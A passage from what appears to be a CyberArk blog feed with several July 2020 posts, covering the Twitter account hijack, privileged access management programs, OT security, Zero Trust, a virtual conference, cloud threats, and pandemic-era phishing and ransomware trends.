Here’s a brief overview: As part of a highly targeted social engineering attack, Twitter employee credentials were used to gain access to an internal administrative tool, hijack a number of high-profile social media accounts, then post messages to dupe social media users into donating bitcoin payments to fraudulent causes. This attack underscores the challenges many organizations face today in securing the growing number of identities that require privileged access to sensitive information and data.

2.  The principles of least privilege are taking hold. Organizations are searching for ways to further reduce standing access, and provide just the right level of access at just the right time using passwordless techniques that don’t disrupt employee workflows.

3. As security teams move quickly to address new realities, they’re covering the most ground while keeping costs down by adopting access management and PAM solutions delivered as a Service.

 Sharing Our Identity Security Vision

On Day One of Impact Live, CyberArk Chairman and CEO Udi Mokady took to the keynote stage to share how we’re addressing these three themes, along with our plan to develop an expanded approach to securing identities – one with PAM at its core.

Building on the recent Idaptive acquisition, our Identity Security strategy begins with Zero Trust and uses artificial intelligence to understand context and intent. This approach will help organizations dramatically reduce risk while providing a seamless user experience that will securely enable the business and support any device, application or user – regardless of role or location.

“The traditional approach to managing and securing identities has become obsolete,” Mokady said during the keynote. “The incorporation of the Idaptive technology helps CyberArk extend its foundational strengths in privileged access management, a critical layer to delivering a security-first strategy for protecting access by a range of human, application and machine identities and the services they consume.”

We’re excited about this new chapter and energized by the stories, collaboration, feedback and discussions this week during Impact Live. Over the coming weeks, we’ll be sharing more details on the steps we’re taking to deliver on our Identity Security strategy – like adding support for Idaptive Multi-Factor Authentication across CyberArk products and services. Stay tuned!

]]>
How to Get the Most Out of Your Privileged Access Management (PAM) Program https://www.cyberark.com/blog/from-strategy-definition-to-reporting-how-to-get-the-most-out-of-your-pam-program/ Fri, 17 Jul 2020 21:48:26 +0000 https://www.cyberark.com/?p=96725

Privileged access continues to be a prime target for nefarious characters and poses a significant threat if your security controls are not operating effectively. This makes privileged access management a top business priority.

These five fundamental steps can help establish your Privileged Access Management program, define your risk tolerance and report on your outcomes.

Step 1: Define a PAM Risk Mitigation Strategy

Defining a comprehensive PAM strategy is a critical step to establish the key risks and priorities your program’s activities need to address. It will be influenced by a number of aspects, including the threat landscape, industry trends, audits and oversight requirements. A sound PAM strategy allows you to develop a risk mitigation plan, a roadmap for privileged access and a target operating model (TOM) that helps ensure the long-term sustainability of your controls.

Designing your PAM model will not only provide you with a long-term view of your risk mitigation strategy, but it will also allow you to consider short-term quick wins, such as delivering PAM controls that provide rapid risk mitigation with the least amount of effort – both technically and politically.

Figure 2. Risk prioritization methodology quadrant, CyberArk Blueprint.

The CyberArk Blueprint is a PAM framework that provides prescriptive guidance and best practice recommendations for PAM development. It’s comprised of three guiding principles that make it easy to articulate the value of the PAM work that’s being executed on and why it’s important. This framework provides actionable risk reduction, which can be turned into a customized plan and roadmap that can later be used for reporting purposing.

Step 2: Establish a Baseline of Privileged Controls

You can’t protect what you don’t know exists. To protect privilege within your enterprise, it is essential to understand the current state of privilege within your enterprise. This includes the inventory of assets within your operating environment and the array of privileged accounts that are used to support them. Privileged accounts and credentials can be found everywhere – extending across Active Directory, *NIX, IaaS, PaaS, SaaS, SQL and many other IT, OT and business services. It’s important to scan systems on your network and cloud providers on a regular cadence to uncover privileged accounts, credentials, entitlements and misconfigurations that can pose a risk to your organization.

The data generated from inventory will enable you to assess your level of risk based on your PAM framework and establish a set of targets and priorities for your implementation schedule. It will provide you with a set of numbers (i.e. 15 Window domain accounts, 2,500 Windows server local admins, etc.) that will not only define your remediation strategy but will also establish a set of metrics that can be measured and reported against going forward.

One best practice to consider is integrating your PAM solution with vulnerability management and discovery technologies from vendors like Rapid7, Forescout and Tenable. This serves two purposes: providing security for the privileged credentials used to automatically sign-in to sensitive infrastructure environments and, at the same time, providing valuable insights into asset- and credential-based information that can help inform your migration strategy.

The only thing worse than having risk, is not knowing where you have risk or how extensive that risk is!

Step 3: Evaluate the Strength of Existing Controls

Defining your PAM strategy and framework establishes your risk goals and tolerance. Meanwhile, your baseline of privileged controls delivers an inventory of both privileged accounts and technology assets. Understanding the state of the existing controls that protect privileged accounts and sensitive information within your assets is critical to defining the next steps of your action plans. Consider the following:

  • Existing governance and policy language around privileged accounts and asset management
  • Policies and procedures around provisioning, including gating, automation and signoffs
  • A complete review of privileged accounts, roles and responsibilities and entitlements that ensure they are appropriate
  • Security technology controls to protect, detect and monitor access
  • Continuous assessment and testing on a regular basis to validate and remediate the strength of controls

Assessments of these types of controls will provide you with a knowledge of the key areas where you need to focus your program, whether that means quick wins or longer term strategic plans, and will also provide intelligent information to feed either your existing mapping framework or your governance, risk management and compliance (GRC) tools. This will enable you to visually illustrate where you have controls in place, where they need to be strengthened and how they map to other industry or regulatory compliance requirements.

Figure 3. Example policy and controls table.

Understanding the state of your existing controls puts you in the risk driver seat. It allows you to demonstrate your remediation activities against your risk framework and alters the paradigm of having to rely on Audit to discover deficiencies. It transforms into a sound governance model.

Step 4: Design an Effective Reporting Framework

Developing executive reporting can be challenging as you balance the amount of data you produce with setting the right tone with the right message in your reports. It is essential that your reporting not only depicts progress, but also measures your achievements against your strategy and risk reduction against your framework. Your framework should also consider the audience you are reporting to – whether it is an executive oversight committee, PAM steering committee, Senior Leadership team, audit committees or the board of directors.

Generally, the reporting audience is interested in seeing material progress with the program; on pace to achieve the objectives and driving risk reduction aggressively. It is effectively a report that qualifies the investment in both resources and finances the organization has made towards the initiative.

The score card below (Figure 4) is an illustration of the program “at a glance,” providing a view of the PAM implementation strategy designed for CISOs and highlighting key areas of both progress and exposure. It measures accomplishments against a series of defined timelines and calls out risk levels based on a pre-established set of measures, typically defined by a CISO. At a glance, you can tell if projects are progressing and whether or not the current state of onboarding is operating within the risk tolerance levels.

Figure 4. PAM risk and implementation scorecard.

Step 5: Execute Your Reporting Strategy

Your reporting now becomes your narrative. It informs your leadership and oversight communities of the importance of the program, the progress achieved, issues that need to be managed and the level of risk mitigated as a result of the controls. The messages need to be succinct, concise and informative and will often need to be customized to the audience you are reporting to. Your reporting will be in the form of scorecards, dashboards, presentations and possibly open communications. The most important thing to remember is that your reporting sets the tone of your program. Understanding your audience, what they need to know and where they can help is fundamental to determining how you formalize your communications.

A wide variety of built-in reports – including inventory, entitlement and compliance reports – can be helpful in developing your scorecards and dashboards. Consider maximizing your time by leveraging automated processes to create your dashboards and scorecards. Exporting easily-ingested data into other business analytics and intelligence tools, such as Splunk, Tableau and PowerBI, is another best practice. Consider enriching the data with inputs from other inventory tools, entitlement databases and compliance reports for additional contextual awareness. Your reporting should also be capable of feeding your GRC tools so that the organization has a real time view of the risk and control landscape. Use the tools that you have at your disposal and get the most from your existing technology investments.

When it comes to an effective reporting strategy, perception becomes your new reality. Make sure you understand the audience you are reporting to and that you provide meaningful, transparent and clear communications regarding your program that set the appropriate tone. If you don’t, your reporting committees will draw their own conclusions and they will define the narrative for you.

More Than Just Technology

Securing privileged access is instrumental in mitigating the risk of a cyber-attack and maintaining business continuity. A successful PAM program is about more than just technology; it takes great people and well thought out processes to achieve optimal results.

Before you can report back the success of your PAM program, it’s critical that you get off on the right foot with a guided and prescriptive framework. Explore the CyberArk Blueprint now to start your journey to PAM excellence.

]]>
Security for the Modern OT Environment https://www.cyberark.com/blog/security-for-the-modern-ot-environment/ Thu, 16 Jul 2020 12:00:31 +0000 https://www.cyberark.com/?p=96430

Operational Technology (OT) – the hardware and software that’s used to monitor, detect and control changes to devices, processors and events of industrial equipment are popular targets for cyber attackers…and for good reason. Unauthorized access to critical Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) systems can wreak havoc on power stations, transportation networks and smart city infrastructure.

Because a breach of the OT environment could result in electric grids shutting down, alarm systems being disabled and ecological disasters from oil refineries, OT access is often air-gapped and has no connection to outside networks.

However, critical OT systems and applications still need to be accessed by operators, engineers and contractors from outside of the network.  And, with many employees working remotely these days, secure access from various locations and authorized users is required. Many organizations rely on vendors and third parties to update their systems. Typically, they handle this by using a VPN or opening up the firewall.

While many OT network architectures include some level of security processes and protocols,  traditional IT security products and solutions oftentimes can’t be used in an OT environment because they aren’t meant to be used in the specially-designed OT environments, making it easier for dedicated attackers to get through to their targets with things like worm malware or by exploiting employee or vendor access and masquerading as a trusted insider.

For security purposes within OT, the seven-layer model from Purdue Enterprise Reference Architecture (PERA) is often used to segment networks with three different zones, starting at the top with Enterprise, then Industrial Demilitarized Zone and, finally, the Manufacturing or Industrial Zone.

Finding solutions that provide the necessary security for OT environments while not hindering the productivity of remote users has long been believed to be a near-impossible task. In addition to simply providing secure remote access, different security protocols are needed for different types of sensitive assets – making the security landscape even more complex.

This often resulted in a choice between providing too much access in the name of operational use or providing too little access in the name of security. Either way, a team of security people are needed to manage the process. The end result is some combination of high costs or lost time for IT administrators and security teams alike.

Organizations with OT environments are in dire need of a solution that not only provides increased security for the most sensitive assets and environments, those on Level 0 and Level 1 of the PERA model, but which can also keep remote users happy and productive.

Effective security for OT environments starts with identifying any privileged accounts and credentials that are used to connect to SCADA systems, ICS, smart sensors and more, and properly securing access to these systems. All privileged accounts and credentials should then be secured and managed within an encrypted repository and rotated frequently.

Next, identify the users that require access and help ensure that tools are in place to keep these users productive, but also secure. This is where CyberArk can help.

CyberArk Alero provides security controls that give remote users access only to what they need, when they need it. The solution directly integrates with the CyberArk Privileged Access Security Solution to provide automatic session isolation that’s needed for Level 0 assets to ensure that potentially compromised endpoints never touch OT environment systems. For additional security, all sessions are automatically recorded and monitored and, in the event of anomalous or potentially malicious activities, can be remediated in real-time.

CyberArk Alero provides organizations with OT environments with an easy way to secure and enable remote access to critical applications and systems managed by CyberArk.

With CyberArk session management capabilities, as long as the session management server is pointed to the device and connected via a supported protocol (RDP, SSH, application, etc.), all sessions are automatically isolated, recorded and monitored. If the device isn’t able to connect to CyberArk’s session management capabilities, there are a variety of plugins or gateways that exist on CyberArk Marketplace or custom ones can be generated.

For more information on CyberArk’s approach to securing OT environments, visit us here.

]]>
Grow Up! Plotting Your Path Along the Zero Trust Maturity Model https://www.cyberark.com/blog/grow-up-plotting-your-path-along-the-zero-trust-maturity-model/ Wed, 15 Jul 2020 20:07:45 +0000 https://www.cyberark.com/?p=98935

From the philosophy behind it, to the technology that powers it, at Idaptive we’ve talked about Zero Trust a lot (see the list of the entire Zero Trust blog series at the bottom of this post). That’s a good thing because all big shifts in both strategy and approach take repetition, repetition, repetition (see what I did there?) before they gain universal understanding and buy-in. Let’s wrap up this series by highlighting six things you can do to move down the path to achieving a Zero Trust security posture.

1) Never trust, always verify

Zero Trust is actually pretty simple. It all starts with a mindset, and the mantra that guides it: “never trust, always verify.”

Don’t automatically trust users or devices because they have access to your network. Doing so assumes that your security perimeters are secure (hint: they’re not) and you’re able to definitively separate the “good guys” from the “bad guys” as they enter your perimeter. Instead, organizations must shift their mindset and examine the context of every access attempt — regardless of where the resources resides — in order to verify every user, on every device, for every access attempt, every time.

This is easier said than done, but once an organization has transformed its security culture to place Zero Trust at the foundation, it simply becomes how security happens. That’s “never trust, always verify.”

2) Adopt MFA here, there, and everywhere

Hands down, multi-factor authentication (MFA) is the single-best line of defense against unwanted guests wielding compromised credentials. But the effectiveness of MFA is dependent on how it’s adopted and consistently used across an organization.

Malicious actors are like water flowing down a hill — they will always take the path of least resistance. If one of your users are not using MFA somewhere, they’re going to find that user and exploit that vulnerability. Most companies today use pockets of MFA for only certain resources like VPN, or a different MFA solution for an individual application.  This approach leads to varying and inconsistent user experiences, and leave significant gaps where MFA is not applied.

Even with a consistent method to apply MFA capabilities across all apps and services, at best, users are prompted to verify their identity every time they access any resource (which can be annoying and impact productivity). At worst, MFA isn’t used on some apps and services, creating the path for bad actors to flow right into your networks.

For true Zero Trust, organizations should use a platform approach that applies MFA to every app and service and integrates with other features to improve users’ productivity instead of hindering it.

3) Avoid the use of VPN where possible, and adopt an application gateway instead

Supporting the shift to remote work has been at the top of every IT team’s to-do list over the last two months. Many companies have chosen to go the virtual private network (VPN) route. While good for a quick fix, VPN connections can often be pricey — and if not maintained and implemented properly — expose wide swathes the corporate network to bad actors, when only limited access to certain critical applications is needed.

You could secure remote access in the short-term using MFA on the VPN instead of passwords alone, but a more Zero Trust-oriented solution is to provide VPN-less access directly to on-prem apps through an application gateway, limiting access to only those apps that a user needs. This mitigates the risk inherent in VPN connections, and replaces it with secure, behind-the-firewall access to individual on-premise applications.

By using a cloud-based gateway there’s no hardware to install or maintain, no firewall rules to change, and no need to provide full network access for external users (remote employees, but also vendors and partners.) It’s your IT team’s remote access wish list gift-wrapped in Zero Trust packaging.

4) Fuse single sign-on with MFA to maximize user productivity

Single sign-on (SSO) is a powerful tool that saves users hundreds of hours managing logins and businesses millions of dollars in boosts to productivity. Alone, it’s a double-edged sword that can greatly decrease an organization’s attack surface, but also increases the impact of a breach because of its centralized access.

But Zero Trust has an answer. SSO can be combined with MFA to form a potent pairing that eliminates the need to enter multiple passwords — without giving up the keys to the kingdom when one login is compromised. SSO and MFA together create additional layers of security that require both the user and their device to be verified, making access both secure and transparent for the end-user.

5) Balance security with usability through conditional and risk-based access

With SSO and MFA working in concert, the next step on the Zero Trust journey veers into what we call “Next-Gen Access” territory. Next-Gen Access marries these capabilities with artificial intelligence and machine learning to verify identity and make access decisions in real-time.

Whether using a recognized device from the office or a personal laptop from a remote location, conditional and risk-based access tools prompt users with just the right amount of security steps to verify authenticity every time — without sacrificing security. Next-Gen Access platforms do the heavy lifting to understand and assess user behavior, develop a unique model for each of them, and then grant access based on risk— so that security is properly balanced with a killer user experience

6) Look for identity and access management solutions that work well together, and make integrating with your existing and future IT environment easier

Once you’ve come this far, you’ve probably realized that the key to Zero Trust is picking the right tools for the job. It’s critical that you pick identity and access management solution(s) that work well together, and can integrate with your existing and future IT environments with ease.

Find a vendor that has capabilities for each of the use cases I discussed here today, instead of just one. Most companies who stumble on this leg of the journey tend to do so when they try a hodgepodge of different vendors and aren’t able to create the uniformity and consistency for a truly Zero Trust security posture. Look for a platform that offers a strong partnership and support offerings with other solutions, and a rich history of excellence around Zero Trust and can walk you down the path.

Reaching Zero Trust maturity

So what happens to organizations that adopt a Zero Trust strategy? In addition to protecting valuable business, customer, or partner data — studies have shown that mature Zero Trust organizations experienced 50% fewer breaches. They also spent 40% less on technology related to identity and access management when taking a platform approach versus buying and integrating individual IAM products, because everything is integrated. An integrated solution avoids a lot of the extra effort required when managing different products, infrastructure, IT systems, applications,  and more. And it costs less to adopt a platform for Zero Trust identity than to try to piecemeal a solution together.

Perhaps more valuable though, a Zero Trust security strategy creates an organization that’s empowered to get things done. In a separate Forrester report, businesses that had adopted Zero Trust had twice the confidence in their ability to drive new business models forward and bring digital experiences to market. In addition, 66% were more confident in adopting mobile and remote work models, which even after COVID-19 subsides — will continue to be paramount in our new, post-coronavirus reality.

Better security and fewer breaches should be table stakes, but improving productivity, user experiences, and bringing value to customers are what defines successful companies. That’s what this approach to security can do. That’s Zero Trust.

 

Related resources:

White paper: The Rise of AI-Powered Identity Security

Webinar: Achieve Zero Trust with Idaptive

 

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Are You Ready for Impact Live?  7 Reasons to Register Today https://www.cyberark.com/blog/are-you-ready-for-impact-live-7-reasons-to-register-today/ Wed, 15 Jul 2020 12:00:14 +0000 https://www.cyberark.com/?p=96416 Identity Security

On July 21 and 22, CyberArk will host Impact Live, a virtual version of CyberArk Impact – the premier event for privileged access management (PAM) and identity and access management (IAM) professionals. This year, CyberArk Impact has been reimagined in a virtual format that will allow attendees from around the world to explore the cutting edge of PAM and identity security from the comfort of their personal workspaces.

This year’s agenda is packed with keynotes, sessions and workshops geared to a range of industry experience and technical depth.

Here are the top seven reasons to attend our event (did we mention, it’s free?):

  1. Explore the Future of Identity Security

Impact Live will host insightful keynotes that outline CyberArk’s vision and approach to identity security, so that you can be in the best position to shape your modern privilege and access management programs. As more organizations move to a support a more remote workforce, the message ‘identity is the new perimeter’ could not ring more true. In parallel, the idea that any identity can be privileged under certain conditions is becoming more of a reality.  These key themes will be covered on the main stage with additional topics to include:

  • CyberArk’s identity security vision
  • Securing privileged access in a hybrid world
  • Securing the remote workforce in the new norm 
  1. Learn About Idaptive

On May 13, CyberArk acquired Identity-as-a-Service leader Idaptive. Together, CyberArk and Idaptive will provide a comprehensive, security-first approach to managing and protecting all types of identities in the cloud and in on-premises environments.

Idaptive will be a key topic across all Impact Live content. Attendees interested in learning more about Idaptive’s AI-powered access management capabilities can also attend the following breakout sessions:

  • Identity Assurance with Adaptive Multi-Factor Authentication (MFA)
  • Identity Management with Modern Single Sign-On
  • Building a Secure Source of Truth to Automate Identity Lifecycle Management 
  1. Benefit Your Business by Learning PAM Best Practices

Impact Live attendees can customize their agenda to develop essential PAM skills. These sessions align with the CyberArk Blueprint for PAM Success, a simple, prescriptive framework for building an effective PAM program.

With over 40 unique breakout sessions and hands-on technical training, Impact Live will help attendees maximize the value of their PAM investment across the enterprise, whether that’s through streamlining audit and compliance or using threat analytics to detect risky behavior.

Training and breakout sessions will explore PAM best practices, including:

  • PAM 101: Core Basics of a Successful Privileged Access Management Program
  • Remote Risk: Securing Remote Vendor Access
  • Native Access for Privileged Session Management: UX is King
  • Access Control and Linux: Best Practices for Risk Reduction and Accountability
  • Configuring Just-In-Time Access
  • Enforcing Least Privilege on the Endpoint
  • Preventing Ransomware and Credential Theft Attacks on the Endpoint
  1. Expand Your PAM Skillset: Address Digital Transformation and Emerging PAM Challenges

One focus of Impact Live is providing attendees with the information they need to address emerging cybersecurity threats and security challenges driven by digital transformation. Impact Live’s breakout sessions and training will feature demonstrations of CyberArk products, services and open source tools to help attendees solve advanced challenges.

These sessions include:

  • Breaking the Cloud Using Five Different Methods
  • CI/CD and Development Environments – The Achilles Heel That Attackers Are Exploiting
  • Renegade Robots: The CISOs Take on Securing Robotic Process Automation
  • Securing In-House Applications with Application Access Manager
  1. Interact with CyberArk and PAM Experts

Despite being virtual this year, Impact Live will have several opportunities for you to discuss with and learn from peers and CyberArk technical experts on industry topics.

Discovery Center booths will provide a deep dive into areas like:

  • Managing risk in multi-cloud environments
  • Identity-as-a-service
  • Secure apps, tools, containers and DevOps
  • Implementing least privilege on the endpoint

Additionally, attendees can discuss PAM program roadmap design with experts from our event sponsors: Optiv, KPMG and PwC.

And, of course, CyberArk technical experts will be directly available to attendees. There will be  dedicated ‘Ask the Expert’ Q&A sessions where experienced professionals weigh in on your security challenges.

  1. Earn CPE Credits and Discounts on CyberArk Certification

We believe ongoing education is essential to keeping up with the shifting landscape of security technology. Impact Live attendees can earn up to 30 Continuing Professional Education (CPE) Credits towards a variety of industry accreditations through organizations such as ISC2. We will also provide attendees with the opportunity to earn discounts on CyberArk Certification Exams and training courses by participating throughout the event.

By participating in training at Impact Live, attendees can develop in-demand skills to accelerate the adoption, productivity and ROI of their organization’s CyberArk PAM deployment.

  1. It’s Free and Global!

CyberArk Impact Live removes the need for travel and budget to attend the premier event for PAM and IAM professionals. Regional agendas provide guidance as to when sessions will stream live in your time zone, so you can join the event and catch premium content regardless of your geographic location.

No matter what your area of interest, Impact Live has you covered. Explore the agenda to find the sessions that are right for you. You can join Impact Live from anywhere in the world at no cost to you or your organization. Why not explore whatever makes you curious?

Ready to build your knowledge of the world of PAM and identity security? Register for Impact Live Today.

]]>
The Egregious 11: Examining the Top Cloud Computing Threats https://www.cyberark.com/blog/the-egregious-11-examining-the-top-cloud-computing-threats/ Thu, 09 Jul 2020 12:00:17 +0000 https://www.cyberark.com/?p=95704 Cloud Security

Each year, the Cloud Security Alliance (CSA) releases its “Top Threats to Cloud Computing” study to raise awareness of key risks and vulnerabilities in the cloud and promote strong security practices.

The latest edition, The Egregious 11, ranks the top eleven cloud threats and provides recommendations for security, compliance, risk and technology practitioners. This installment reflects the widespread surge in cloud use and overall maturation in organizations’ understanding of cloud environments. However, it hints at continued over-reliance on cloud vendors to protect workloads, a troublesome trend we also observed in the CyberArk Global Advanced Threat Landscape 2019 report.

The CSA recorded a drop in rankings of traditional cloud security issues under the responsibility of cloud service providers – such as denial of service, shared technology vulnerabilities and CSP data loss – suggesting these issues are less of a concern for organizations than in years past. The biggest threats now come from issues like misconfigurations and insufficient identity access management where the customer is solely responsible for security.

As organizations utilize the cloud to enable remote work and accelerate digital transformation, there is a need to understand where potential security risks exist and address them head on. Here’s a look at five of the “Egregious 11,” along with steps organizations can take to strengthen their security posture. To explore all 11 cloud security challenges, along with CSA recommendations, check out the full study.

 Data Breach

With the average total cost of a data breach now at $3.92 million, it’s unsurprising this is ranked as the number one cloud threat. Cyber attackers are after data – particularly personal information – and data accessible via the Internet is the most vulnerable asset to misconfiguration or exploitation. As more data shifts to the cloud, effectively protecting it begins with the question, “Who has access to this?”

 Misconfiguration and Inadequate Change Control

Misconfigurations – including granting excessive permissions or unchanged default credentials – occur when computing assets and access are set up incorrectly. Misconfiguration of cloud resources is a leading cause of data breaches and can result in deleted or modified resources and service interruptions. The dynamic nature of the cloud makes traditional change control approaches for proper configuration extremely difficult.

To overcome cloud misconfiguration maladies, the CSA urges organizations to embrace automation tools that can continuously discover issues like unmanaged privileged accounts and instances to prevent misuse.

Insufficient Identity, Credential, Access and Key Management

The cloud introduces a host of changes and challenges related to identity and access management (IAM) and particularly to privileged access management (PAM), since privileged credentials associated with human users as well as applications and machine identities are exceptionally powerful and highly susceptible to compromise in cloud environments.

Once an attacker obtains privileged credentials, they can gain full access to sensitive databases, or even to an organization’s entire cloud environment. Attackers know this. Many recent attacks targeting IaaS and PaaS environments have exploited unsecured credentials, resulting in cryptojacking, data breaches and destruction of intellectual property and other sensitive data.

The CSA stresses the need for strict IAM controls for cloud users and identities including following the principle of least privilege to protect privileged access to high-value data and assets. It also notes that cloud access keys (e.g., AWS access keys, Google Cloud keys and Azure keys) must be rotated and centrally managed, while unused credentials or access privileges are removed.

Account Hijacking

Using phishing methods, vulnerability exploitation or stolen credentials, malicious attackers look for ways to access highly privileged accounts in the cloud, like cloud service accounts or subscriptions. Account and service hijacking means full compromise: control of the account, its services and the data within. The fallout from such compromises can be severe – from significant operational and business disruptions to complete elimination of organization assets, data and capabilities.

To protect against account hijacking, the CSA recommends defense-in-depth and strong IAM and PAM controls, such as credential lifecycle and provisioning management and segregation of duties.

Insider Threats

Malicious insiders can be current or former employees, contractors or other trusted third parties who use their access to act in a way that could negatively affect the organization. Since insiders have legitimate access, pinpointing potential security issues can be extremely difficult and remediating incidents can be costly. According to the Ponemon Institute’s 2020 Cost of Insider Threats Study, the average global cost of insider threats rose by 31% in two years to $11.45 million and the frequency of incidents spiked by 47% in the same time period.

Whether it’s a privileged user abusing their level of access or inadvertently misconfiguring a cloud resource, having a PAM program in place to protect from these insider abuses is paramount.

 Don’t Be An Egregious Offender. Secure Your Cloud with PAM

The cloud has fundamentally changed the notion of privilege. Now, even ordinary user credentials in the cloud and DevOps environments can hold as much power as administrator-level credentials do for other types of systems. Add in a complex and highly dynamic mix of machines and applications and the privilege-related attack surface grows dramatically.

Poor cloud security practices will inevitably lead to a breach or failed audit and force organizations to slow down – something that simply isn’t an option in the always-on, ultra-competitive digital era.

Strong privileged access controls help ensure that humans, applications and machines have only the necessary levels of access to sensitive applications and infrastructure to do their jobs and that activities occurring within the cloud environment aren’t risky (or if they are, privileged access controls enable SecOps teams to take swift action).

 If you’re looking for more in-depth guidance beyond the CSA’s initial recommendations, tap into these actionable steps for protecting privileged access in cloud environments.

]]>
Cyber Attacks in the Pandemic Era: More of the Same   https://www.cyberark.com/blog/cyber-attacks-in-the-pandemic-era-more-of-the-same/ Wed, 08 Jul 2020 13:00:17 +0000 https://www.cyberark.com/?p=95487

Since COVID-19 began to spread rapidly across the globe, we’ve seen near-constant headlines of cyber attacks hitting organizations in the midst of chaos. An elite group of cyber criminals launched a sophisticated phishing campaign in mid-March, trying to break into the World Health Organization (WHO) and access critical systems and applications. One of the largest hospitals and COVID-19 testing facilities in the Czech Republic was hit by an attack and forced to cancel operations and relocate patients to other hospitals. Meanwhile, spikes in financially motivated attacks seemed to peak as the United States confirmed its first case of COVID-19.

Warren Buffett once said, “Don’t let a good crisis go to waste.” Cyber attackers have long subscribed to this mantra, and it’s clear from the past few months that they are continuing to follow this approach. An FBI lead described these trends as a “collision of highly motivated cyber threat actors and an increase in opportunities.”

But while some threat actors ramped up efforts to maximize profits amidst the crisis – nothing has substantially changed in their approach.

In fact, new Microsoft research indicates that malware attacks linked to coronavirus were “barely a blip” in the total volume of threats it typically sees each month. The global nature and universal impact of the crisis simply made cyber criminals’ work easier. Microsoft notes the attacks peaked in March, then plateaued into a new normal. While these attacks are still more frequent than in January and February, the vast majority of the threat landscape, according to the Microsoft study, has settled back into business as usual: “typical phishing and identity compromise patterns.”

Attackers continue to use the same tried-and-true methods that worked for them long before 2020: find a way in, then target privileged access to unlock doors and get to where you want to go.  It’s in that spirit that we wanted to examine attackers’ favorite intrusion technique –phishing – and a popular malware choice – ransomware.

Phishing: Gaining a Foothold Through Social Engineering

Cyber attackers are the ultimate psychologists. They carefully study human behavior and reverse-engineer our digital footprints to uncover what makes us tick – and what makes us click. They understand that people crave order and safety (they just want to do – and keep – their jobs) and that they are curious and want to stay informed. Phishing preys on these basic human needs and remains highly effective. It’s the number one form of social driven breach, according to the 2020 DBIR. Attackers simply need to re-skin these tactics to align with the crisis or story of the day.

Take the Office 365 phishing attacks, for example. In early May, reports emerged of a phishing campaign that hit high-level executives using Office 365 at more than 150 businesses. A number of similar attacks have been reported, as executives and employees alike work from home.

While these attacks, in of themselves, are nothing new – attackers often create fake, malicious Microsoft 365 login pages to trick email users into entering their credentials – we’ve observed a “twist” to this approach in recent months that targets temporary tokens (aka access tokens) that are generated to allow Single Sign-On (SSO) for Microsoft 365 and all Microsoft applications. By stealing and using these temporary tokens, attackers can bypass Multifactor Authentication (MFA) and persist on the network by “legitimately” refreshing the token. What’s more, even if a user changes their password, the token remains valid and cannot be revoked.

Video and chat apps – like Microsoft Teams, Slack, WebEx, Zoom and Google Hangouts – have become the new face of the organization during this time of remote work. Attackers have added these cloud-based applications to their phish list, using the same general techniques they’ve used with email since forever.

Within these SaaS apps, they can easily distribute malicious files, code and even GIFs to scrape user data, steal credentials and even take over entire enterprise-wide accounts. (Read more about this in the Labs Teams’ research piece, “Beware of the GIF: Account Takeover Vulnerability in Microsoft Teams.”) Or, by compromising employees’ digital identities – particularly those of privileged users like sys admins – attackers can develop persistence and siphon sensitive data from these collaboration tools – daily reports, financial data, IP and more.

As organizations onboard more cloud applications and services to support their remote workers, we can expect to see more innovations like these from attackers. But, at the end of the day, it’s still phishing. Enforcing least privilege, credential theft protection and application control across endpoints – whether they’re at home or the office – is critical.

 Ransomware: Attacks of Opportunity

Ransomware has always been most effective when targeting critical and time-sensitive information. As the pandemic surged, reports of ransomware targeting hospitals and healthcare providers underscored the dangerous – even deadly – consequences of these attacks. Understanding that downtime can spell the difference between life and death, cyber criminals have long targeted these critical organizations, knowing that they will often pay out hefty ransoms to get operations back and running quickly.

During this time, attackers extended their sights to a new sector – research and development and biotechnology companies working fast to find a coronavirus cure. For example, Reuters reported that nation-state attackers targeted staff at U.S. drug maker Gilead Sciences after it announced a Phase 3 Trial of an investigational antiviral drug. According to Reuters, in one instance, a fake email page designed to steal passwords was sent to a top executive. As more organizations progress their vaccine research, cybercriminals with varying motives have increased attacks.

As they compete with other nations to find a cure, and also inform their own country’s response, nation-state APT attackers are launching RDP attacks or targeting workers’ endpoints in search of privileged credentials to establish a foothold and move laterally. From there, they can maintain persistence on the network and steal sensitive research little by little. In some cases, they may wait weeks or even months for the “perfect moment” to deploy ransomware to further exploit these victim organizations. Microsoft research shows how criminal groups are using popular strains, like Robbinhood, Maze and REvil, to carry out “long-tail” ransomware attacks.

R&D and biotech organizations are particularly vulnerable, since they’ve not been targeted heavily in the past and many are still maturing their security programs. But, while these industries may be the target du jour, no organization is safe from ransomware. It’s a widely used attack vector that continues to grow in popularity thanks to risky work-from-home habits and the rise in ransomware-as-a-service.

What’s changed most during this time of uncertainty is the narrative. Security incidents and breaches linked to COVID-19 are amplified by frenetic news coverage and constant social media chatter. The public, hungry for information and updates, is drawn to the drama – and headlines of sophisticated scams and ruinous ransomware have delivered on that. As a result, security is now at the forefront of conversation.

 So, Now It’s Your Turn: Don’t Let a Good Crisis Go to Waste

We’re not out of the woods yet and there’s still much to be learned, particularly as organizations consider permanent changes to remote work policies. But this first phase has revealed some important truths about the way people behave and work and how businesses need to adapt for this new reality.

Now is the time to scrutinize your security practices—particularly how you’re protecting privileged access – and chart your path for change. By taking this opportunity, you can protect your organization from future loss and strengthen your security posture to ensure long-term success.

 

]]>
How Security Islands Prevent Effective Secrets Management https://www.cyberark.com/blog/how-security-islands-prevent-effective-secrets-management/ Thu, 02 Jul 2020 14:19:08 +0000 https://www.cyberark.com/?p=95302 Secrets Management

